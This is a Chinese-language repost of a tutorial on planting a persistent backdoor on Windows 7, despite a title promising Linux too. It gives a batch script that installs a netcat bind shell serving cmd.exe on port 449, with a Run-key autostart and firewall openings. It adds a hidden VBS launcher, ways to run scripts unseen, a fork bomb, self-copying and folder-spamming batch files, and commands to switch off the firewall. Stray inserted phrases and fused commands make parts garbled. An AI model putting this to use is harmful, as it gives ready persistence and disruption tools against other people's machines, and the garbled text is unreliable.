如何在Windows、Linux中安装后门？

本文作者：secdarker

打开应用保存高清大图

操作系统后门学习—Windows篇

0×00 准备工作

假设用户以管理员权限登入系统，在Windows 7系统上使用netcat创建一个后门。

Netcat 功能非常单一, 缺少了许多我们渗透工作中必须的功能。为此我们将建立一个的工具包来解决这个难题 :

1.下载额外的文件跟附加持续. 2.编辑更改指定文件. 3.快速创建执行后门. 4.控制远程服务器并进行恶作剧 ：）

为了便于你第一时间获取到你的工具包，你必须将它放置在一个独立的U盘或者服务器上。

工具(Portable Applications)

工具是这些不需要安装即可直接使用的程序，它们通常将所有的执行环境跟核心程序原本共同打包成一个独立的文件，方便携带。在独立文件执行的过程中会自行释放额的意愿文件，并建立一个可成功执行目标程序的环境。

1.不依赖特定的dll(dll已经打包) 2.不依赖注册表设置(有也许自行初始化) ，不遗留下任何注册表操作痕迹 3.操作痕迹最小化，尽量减少一切不必要的操作，导致留下过多的系统操作记录

创建 Windows 7 工具集

gVim(跨平台的文本编辑器, 提供强大的命令行操作交互)

Wget(下载 windows 64 位版本)

Netcat

有Kali系统的可以用命令 “find / -name nc.exe”搜索到甚至下载已经编译好的版本

0×01初试 Netcat 后门

nc.exe -dLp 449 -ecmd.exe-L 这个选项会进入一个服务并等待客户端连接， 在客户端连接顺利但是，会提供相应的交互服务。 – p 指定程序的网关(非管理员权限只能更改超过1024的端口. 同时不可复用现有端口) – e 在接收至一个客户端连接后, 会执行一个特定的程序(这里是cmd.exe), 这个程序负责接下来的会话交互(执行客户端后期提交的任何命令) – d 采取静默方式，避免nc运行过程中linux 后门，产生过多额外的日志信息

Windows 7 后门安装批处理脚本

Rem 拷贝文件到系统目录

xcopy '%systemdrive%\%username%\Desktop\nc.exe' 'C: \Windows\System32\' -y

Rem 修改注册表，增加后门自启动代码.

reg add 'HKLM\software\microsoft\windows\currentversion\run' /f /v 'system' /t REG_SZ /d 'C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe'

Rem 添加防火墙规则，开放的449端口，允许内部连接.

netshadvfirewall firewall add rule dir=in action=allow protocol=UDP localport=449 netsh advfirewall firewall add rule dir=in action=allow protocol=TCP localport=449

Rem 添加防火墙规则，允许nc.exe对外提供连接.

netsh advfirewall firewall add rule dir=in action=allow program='C:\windows\system32\nc.exe'

注意：

1.必须使用管理员权限运行上面的脚本.

2.行为注释可删除

更多相关操作:

终端基础命令

Linux命令

1 cd - 切换当前目录至指定模式下 2 pwd - 现实当前工作目录的绝对路径 3 ls - 显示目录中所有文件和文件夹 4 catfile.txt - 现实文件内容 5 wget - 命令行文件下载器 6 vim - 命令行文件编辑器 7 ./scriptname - 运行脚本 8 export PATH=$PATH:/opt/new - 临时添加路径至系统环境变量$PATH

($PATH：决定了shell将到这些目录中寻求命令或程序linux 后门，PATH的值是一系列目录，当你运行一个程序时，Linux在某些目录下进行搜寻你选定的程序)

Windows命令

1 CD 2 PWD 3 Dir/p 4 Type 5 Wget from toolkit 6 Vim from toolkit 7 Wscript scriptname.vbs 8 SET PATH =%PATH%;c:\pathtoolkit

CMD 环境变量Path

c:\> set PATH '%PATH%;C:\bin'

管理Windows PATH 环境变量的批处理脚本

打开应用保存高清大图

使用 VBS 脚本后台运行 Netcat

这样做的好处是我们不用等待电脑重启

Dim objShell Set objShell = WScript.CreateObject('WScript.shell') objShell.run 'C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe' Set objShell = Nothing

使用 Netcat 连接后门

nc-v 目标IP 目标端口

打开应用保存高清大图

查看进程信息(Process Explorer)

Process Explorer下载地址:

打开应用保存高清大图

查看网络连接(TCPView)

打开应用保存高清大图

不使用CMD运行命令以及批处理脚本的几种方法

Vbscript

Set WshShell = CreateObject('WScript.Shell') WshShell.Run chr(34) & 'C:\mybat.bat' & Chr(34), 0 Set WshShell = Nothing

Batch

@echo off start /B mybat.bat

Powershell

PowerShell.exe -windowstyle hidden

0×02 Windows 恶作剧

让键盘持续不断的输入 'Hello'

Set wshShell = wscript.CreateObject('WScript.Shell') do wscript.sleep 100 wshshell.sendkeys 'Hello' loop

以.vbs后缀保存，并执行

按住大小写键不放

Set wshShell =wscript.CreateObject('WScript.Shell') do wscript.sleep 100 wshshell.sendkeys '{CAPSLOCK}' loop

以.vbs后缀保存, 并执行

硬盘（随机生成垃圾文件填充硬盘）

模拟病毒拷贝行为:

:echo off copy /Y %0 %random%.bat start %0%0|%0 goto :e

以 .bat 后缀保存, 并执行

笔记本弹窗

@echo off :top START %SystemRoot%\system32\notepad.exe GOTO top

打开应用保存高清大图

网页弹窗

· start 'www.example.com'

键盘狂舞

· 下面这个脚本会不断的发送按键模拟信息，循环模拟按下“大小写键”，“数字键”以及“截屏键”的操作。从而造成屏幕对应的LED指示灯，疯狂闪烁 . (￣▽￣)'

Set wshShell =wscript.CreateObject('WScript.Shell')do wscript.sleep 100 wshshell.sendkeys '{CAPSLOCK}' wshshell.sendkeys '{NUMLOCK}' wshshell.sendkeys '{SCROLLLOCK}'loop

播放 windows 启动音乐

Set objVoice = CreateObject('SAPI.SpVoice') Set objFile = CreateObject('SAPI.SpFileStream.1') objFile.Open 'Windows XP Startup.wav' objVoice.Speakstream objFi

光驱

持续不断的抽插您的光驱(-__-!!!)

Set oWMP = CreateObject('WMPlayer.OCX.7') Set colCDROMs =oWMP.cdromCollectiondo if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).EjectNext For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop

以 .vbs 后缀保存，并执行

Windows FORK

FORK会不断的复制自身，持续性的耗费系统资源，最终造成系统资源耗尽，无法进行其它的操作。

Windows 批处理FORK

@ECHO OFF :START START fork.bat GOTO START

以 .bat后缀保存，并执行

文件夹锁定攻击

@echo off md hello :A start hello goto A

以 .bat 后缀保存，并执行

鬼话连篇

Set args = Wscript.Arguments speakargtext = args.Item(0)

Rem 你的鬼话赋值给 strText

strText = 'your message here' Set objVoice =CreateObject('SAPI.SpVoice') objVoice.Speak strText objVoice.Speak speakargtext

以 .vbs 后缀保存，并执行。

0×03 实战细节

Windows 关机指令

· %windir%\system32\shutdown.exe -r -t 00 · shutdown -r — 重启 · shutdown -s — 关机 · shutdown -l — 注销 · shutdown -t xx —等待 xx 秒后执行 shutdown/restart/logoff 操作 · shutdown -i — 使用图形用户界面. · shutdown -a — 撤销之前执行的任何shutdown命令

批处理编译成EXE

将脚本编译成二进制文件，能在必定程度上的隐藏你的代码.

– 虽然能够确保完全安全，但是在隐蔽性和灵活性上可有巨大提高.

· 批处理编译工具

–

打开应用保存高清大图

· VBS编译工具

· Powershell编译工具

netsh 配置windows 7防火墙

C:\> netsh advfirewall set allprofiles state off

– 关闭windows防火墙(会有用户提醒信息)

C:\> netsh advfirewall set allprofiles state on

– 开启windows防火墙

C:\> netsh advfirewall reset

– 重置防火墙策略到默认策略状态

C:\> netsh advfirewall set allprofiles firewallpolicy blockinbound, allowoutbound

– 设置防火墙策略为, 默认阻止所有入站通信, 并允许出站通信

C:\> netsh advfirewall firewall add rule protocol=TCP localport=80 action=block dir=IN

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-135648-1.html